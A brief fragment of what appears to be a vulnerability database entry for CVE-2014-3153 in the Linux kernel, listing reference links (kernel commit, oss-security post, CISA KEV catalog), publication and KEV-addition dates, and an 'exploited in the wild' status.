ds/linux/commit/e9c243a5a6de0be8e584c604d353412584b592f8https://www.openwall.com/lists/oss-security/2021/02/01/4https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2014-3153
2014-06-07
Published
2022-05-25
Added to CISA KEV
Exploited in the wild